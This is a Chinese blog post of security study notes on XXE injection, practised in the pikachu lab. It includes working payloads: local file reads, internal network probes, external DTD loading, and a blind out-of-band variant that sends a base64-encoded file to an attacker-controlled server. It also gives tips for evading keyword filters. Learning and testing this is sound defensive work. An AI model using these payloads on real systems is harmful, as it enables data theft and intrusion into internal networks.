初识XML------XXE漏洞

最新推荐文章于 2023-09-08 14:30:00 发布
最新推荐文章于 2023-09-08 14:30:00 发布
阅读量438 收藏
点赞数
分类专栏: 网络安全学习笔记 文章标签: xml 网络安全 web安全 学习 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44770698/article/details/125201267
版权

目录

XML的概念

XXE玩法---读文件

玩法---内网探针或者攻击内网应用(触发漏洞地址)

引用外部实体DTD

无回显---读取文件

绕过

判断

XML的概念

XML(Extensible Markup Language,可扩展标记语言),XML被设计用来传输和存储数据,它是一种很像HTML的标记语言,其设计的宗旨是传输数据,而不是显示数据。

XML和HTML之间的差异:

XML不是HTML的替代,XML和HTML为不同的目的而设计:

  • XML被设计用来传输和存储数据,其焦点是数据的内容。
  • HTML被设计用来显示数据,其焦点是数据的外观。

总的来说HTML旨在显示信息,XML旨在传输信息。

XML文档结构包含着XML声明、XML文档类型定义*(即DTD,也就是XXE漏洞所在的地方)、XML文档元素。

XXE漏洞全称为XML External Entity Injection,即XML外部实体注入漏洞,导致可加载而已外部文件,造成的危害主要有:文件读取、命令执行、内网端口扫描、攻击内网网站等。

XXE玩法---读文件

<?xml version = "1.0"?>
<!DOCTYPE ANY [
    <!ENTITYPE xxe SYSTEM "file:///d://test.txt"> #file后面就是读取的文件的路径
]>
<x>&xxe;</x>

xxe相当于变量,<x>&xxe;</x>表示XML文档元素,可以理解为执行xxe变量(也就是读取d盘下的test.txt文件)。

这里使用pikachu靶场来进行测试:

这里我们在输入框中写入我们的攻击代码,来尝试读取D盘下面的index.txt,其中里面的内容为hello hacker!

输入代码为:

<?xml version="1.0"?>
<!DOCTYPE ANY[
    <!ENTITY xxe SYSTEM "file:///d://index.txt">
]>
<x>&xxe;</x>

玩法---内网探针或者攻击内网应用(触发漏洞地址)

这种玩法不是很常见。

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo[
<!ELEMENT foo ANY >
 <!ENTITY rabbit SYSTEM "http://192.168.1.1:8080/index.txt">
]>

<x>&rabbit;</x>

通过有xxe的漏洞网站,向其服务器内网发送请求,进行判断192.168.1.1的8080端口是否开放,并且判断index.txt文件是否存在。

引用外部实体DTD

主要的作用是自定义攻击,但是前提条件是对方网站没有禁止引用外部实体。

<?xml version = "1.0"?>
<!DOCTYPE test[
    <!ENTITY %file SYSTEM "http://127.0.0.1:8080/evil2.dtd">
     #url指向的是自己的公网的IP地址
    %file;
]>
<x>&send;</x>

DTD文件会被当做xml文件执行,所以在自己的服务器上写上相应的代码即可,evil2.dtd:

<!ENTITY send SYSTEM "file:///d://index.txt">

无回显---读取文件

有时候网站代码中设置不会先,可以通过想自己服务器发送数据来查看信息,一种是查看日志信息,一种是将传递进来的数据直接写入到文件中。

<?xml version = "1.0"?>
<!DOCTYPE test [
 <!ENTITY %file SYSTEM "php://filter/read=convert.base64-encode/resource=d://index.txt">
    用上面的这行代码的情况下不写文件的绝对路径也能正常搜寻,只不过是在当前路径下,而用file的话就要写全路径
 <!ENTITY %dtd SYSTEM "http://192.168.0.103:8080/test.dtd">
%dtd;
%send;  
]>

服务器中test.dtd文件代码:

<!ENTITY %payload
 "<!ENTITY %#X25; send SYSTEM 'http://192.168.0.103/?data=%file;'>"
>
&payload;

以上部分代码来源于小迪老师的课程。

绕过

对于ENTITY、SYSTEM、file等关键字被过滤,可以采用UTF-16BE编码格式绕过。

可以参考文章https:cnblogs.com/20175211lyz/p/11413335.html

如果http协议被过滤可以采用其他的协议进行绕过。例如data://协议、file://协议以及php://filter协议绕过。

判断

通过抓包,看数据包中的关键字,其中包含Content-Type的值的判断,如果后面的值是text/xml或者是application/xml的,就可以判断它接受的就是xml的语言,我们就可以尝试检验是否存在xxe漏洞,当然如果不是text/xml或者是application/xml的,还可以通过修改,将其改成text/xml或者是application/xml。再来判断是否存在漏洞。包括数据包中的数据可能是如下的这种形式,都可以进行一个判断(它是传输的xml的语句格式。可能造成xxe的漏洞)

<user><username>1</username><password>1</password></user>

xxe安全漏洞自动化注入脚本工具XXEinjection---使用ruby编写。使用前需要安装ruby相关环境。

参考链接:7.XXEinjector:一款功能强大的自动化XXE注射工具 - bmjoker - 博客园

Y4y17
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
XML实体注入漏洞
zhangge3663的博客
02-11 677
XML实体注入漏洞 测试代码1:新建xmlget.php,复制下面代码 <?php $xml=$_GET['xml']; $data=simplexml_load_string($xml); print_r($data); ?> 漏洞测试利用方式1:有回显,直接读取文件 <?xml version="1.0" encoding="utf-8"?> <!DO...
WEB漏洞原理】XML&XXE利用检测绕过
过期的秋刀鱼
09-14 798
XML被设计为传输和存储数据,XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素,其焦点是数据的内容,其把数据从HTML分离,是独立于软件和硬件的信息传输工具。XXE漏洞全称XMLExternal Entity Injection,即xml外部实体注入漏洞XXE漏洞发生在应用程序解析XML输入时,没有禁止外部实体的加载,导致可加载恶意外部文件,造成文件读取、命令执行、内网端口扫描、攻击内网网站等危害XXEXML的一个漏洞XXE产生根本原因:网站接受XML数据,没有对xml进行过滤。
XXE&XML】利用检测绕过
qq_41889600的博客
12-13 460
小迪安全xxe xml
漏洞总结——XXEXML外部实体注入)
Spontaneous_0的博客
09-08 435
XXE漏洞全称为 XML External Entity Injection,即XML外部实体注入XXE漏洞发生在应用程序解析XML输入时,没有禁止外部实体的加载, 导致用户可以控制外部的加载文件,造成XXE漏洞
XXE Injection笔记
Bendawang's Blog
07-05 3868
XXE Injection笔记
XXE - 防御策略-01
09-15
XXEXml External Entity)漏洞是一种常见的 XML 解析漏洞,攻击者可以通过构造恶意 XML 文档来读取敏感信息或执行系统命令。为了防御 XXE 漏洞,需要了解其成因和防御策略。 一、XXE 漏洞消亡原因 从 2018 年...
CTF-网络挑战
03-02
本项目只是对历届CTF开源的网站 申明 由于本人重新向出题人申请重新对过渡进行修改发布的权利,但对每个题均标明了出处,如涉嫌犯罪,立马致歉删除。 对于部分没找到flag的翻译,会自己随便添加 ...XXE 科学技术研究院
WebGoat8-xxe注入漏洞分析
最新发布
09-15
Web 应用程序安全测试中,XXEXML External Entity)注入漏洞是一种常见的漏洞,攻击者可以通过该漏洞读取服务器上的敏感信息甚至控制服务器。下面是对 WebGoat8 中的 XXE 注入漏洞的分析。 XXE 注入漏洞的工作...
ctf-web网络安全课程视频.zip
10-19
网盘文件永久链接 1 - 代码执行与命令执行安全漏洞与防御... 2 - 文件上传安全漏洞与防御... 3 - XXE安全漏洞与防御... 4 - SSRF安全漏洞与防御... 5 - PHP反序列化安全漏洞与防御... 6 - Python 安全开发基础...
XML schema 编辑工具 xxe-perso-4_9_1
11-19
"xxe-perso-4_9_1"看起来是一款专门针对XML Schema编辑的工具,版本号为4.9.1。这类工具通常提供以下功能: 1. **XML Schema设计**:用户可以通过图形界面设计复杂的XML Schema,定义元素、属性、数据类型、约束等...
webug4.0之xxe注入
good good study
04-24 4734
关于xxe漏洞,传送门 -》xxe漏洞详解 1. 页面观察 让我们登录,我们随便输入一个字符如admin,观察页面,出现了xml有关的东西,我们就要怀疑存在xml注入 2. 看是否能解析xml数据 这里我们使用burpsuite截取数据包,更好的观察。将以下的测试语句提交到输入框中,如果程序能输出 “my name is nMask”则说明能都解析xml数据 <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE root [
XXE漏洞学习
qq_62078839的博客
04-23 382
漏洞原理 XXE漏洞就是XML外部实体注入,就是当xml引用外部实体并解析的时候会产生的漏洞xml解析器去获取其中的外部资源并存储到内部实体中,攻击者可引用外部实体对目标进行文件读取、命令执行、DDOS、内网探测等。 利用方式 命令执行 <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE a[ <!ENTITY test SYSTEM "命令"> ]> <c>&test</c>
XML漏洞分析
F1or_的博客
08-19 706
可以看见这里的函数其实是已经获得了calc,即我们传入的字符了,但是最后却没有返回,返回的是一个带有calc的ValueObjectImpl,而且你可以发现,现在的getValObject是在StringElementHandler的里面,对应前面一开始传入的hashmap对应值,也就是说在这里他截取了。看一下之前的xml文件,这一部分之前说过,当property不为空就可以进入循环,就是在下图这个位置,然后invoke,直接调用方法了,这里是先进行赋值。里面有个invoke,成功执行了。
xml简介 XXE简介以及ctf.show的XXE(web373-web343)
wanan的博客
09-30 585
xml简介 XXE简介以及ctf.show的XXE(web373-web343)
XXE漏洞以及Blind XXE总结
热门推荐
Exploit的小站~
05-10 5万+
 转载请注明出处:http://blog.csdn.net/u011721501 0、前言 XXE漏洞是针对使用XML交互的Web应用程序的攻击方法,在XEE漏洞的基础上,发展出了BlindXXE漏洞。目前来看,XML文件作为配置文件(Spring、Struts2等)、文档结构说明文件(PDF、RSS等)、图片格式文件(SVGheader)应用比较广泛,此外,网上有一些在线XML格式...
XXE xml实体注入
4ct10n
11-03 6414
1.科普ENTITY 实体 在一个甚至多个XML文档中频繁使用某一条数据,我们可以预先定义一个这条数据的“别名”,即一个ENTITY,然后在这些文档中需要该数据的地方调用它。 XML定义了两种类型的ENTITY,一种在XML文档中使用,另一种作为参数在DTD文件中使用。 ENTITY的定义语法: <!DOCTYPE 文件名 [ <!ENTITY 实体名 "实体内容">
XXE漏洞详解(XML外部实体注入)
谢公子的博客
01-12 1万+
目录 XXE XXE漏洞演示利用 Blind OOB XXE 场景1 – 端口扫描 场景2 – 通过DTD窃取文件 场景3 – 远程代码执行 XXE漏洞的挖掘 XXE的防御 在学习XXE漏洞之前,我们先了解下XML。传送门——>XML和JSON数据格式 那么什么是XXE漏洞呢? XXE XXE(XML ExternalEntity Injection)也就是XML...
XML注入攻击
beyond__devil的博客
10-10 1万+
一、漏洞描述 XML文件的解析依赖libxml库,而libxml2.9以前的版本默认支持并开启了外部实体的引用,服务端解析用户提交的xml文件时未对xml文件引用的外部实体(含外部普通实体和外部参数实体)做合适的处理,并且实体的URL支持file://和php://等协议,攻击者可以在xml文件中声明URI指向服务器本地的实体造成攻击。 图片素材来自网络 二、形成原因 解析
XXE漏洞
weixin_44940180的博客
08-14 870
XXExml external entity injection) 一、xxe漏洞 xml外部实体注入漏洞,发生在应用程序解析xml输入时,没有禁止外部实体的加载、导致可加载恶意外部文件,造成文件读取、命令执行、内网端口扫描、攻击内网网站、发起dos攻击等危害。是XML注入的一种,普通的XML注入利用面比较狭窄,如果有的话也是逻辑类漏洞XXE扩大了攻击面。 xxe是一种针对xml终端的实施攻击,想要实施这种攻击需要在xml的payload的包含外部实体声明,且服务器本身允许实体扩展,这样就能读取web
泛微oa e-cology xxe 漏洞
08-17
泛微OA是一种常见的企业办公自动化系统,而XXEXML外部实体注入)漏洞是指攻击者通过注入恶意的外部实体来读取或利用系统中的敏感数据。 泛微OA的XXE漏洞是由于系统对外部XML实体的处理不当所导致的。攻击者可以通过构造恶意的XML实体并将其发送给系统,然后利用系统对外部实体的解析不当来读取系统中的文件,包括敏感的配置文件、数据库信息。攻击者还可以通过XXE漏洞发起钓鱼攻击或者是向系统发送恶意的请求来进一步导致系统的安全漏洞。 为了防范泛微OA的XXE漏洞,建议以下几点: 1. 进行安全审计:对泛微OA系统进行定期的安全审计,通过检测系统中的漏洞和弱点,及时修复存在的XXE漏洞。 2. 模板限制:在处理外部XML实体时,应限制或阻止对外部实体的解析,避免可能的XXE攻击。可以通过设置合适的解析选项,限制对外部实体的访问权限。 3. 输入验证与过滤:对于用户输入的数据,应进行合理的验证和过滤,确保输入的内容符合预期格式,避免恶意的外部实体注入。 4. 更新补丁:定期保持泛微OA系统的更新与升级,及时安装官方发布的补丁和修复漏洞的版本。 5. 安全意识培训:加强企业员工的安全意识培训,提高他们对XXE漏洞及其他安全威胁的认识,避免因无意中点击恶意链接或下载恶意附件而导致漏洞的利用。 通过以上措施,可以有效地减少泛微OA中的XXE漏洞,提升系统的安全性。及早识别并修复漏洞,有助于保护企业的机密信息以及防止潜在的安全威胁发生。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Y4y17

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值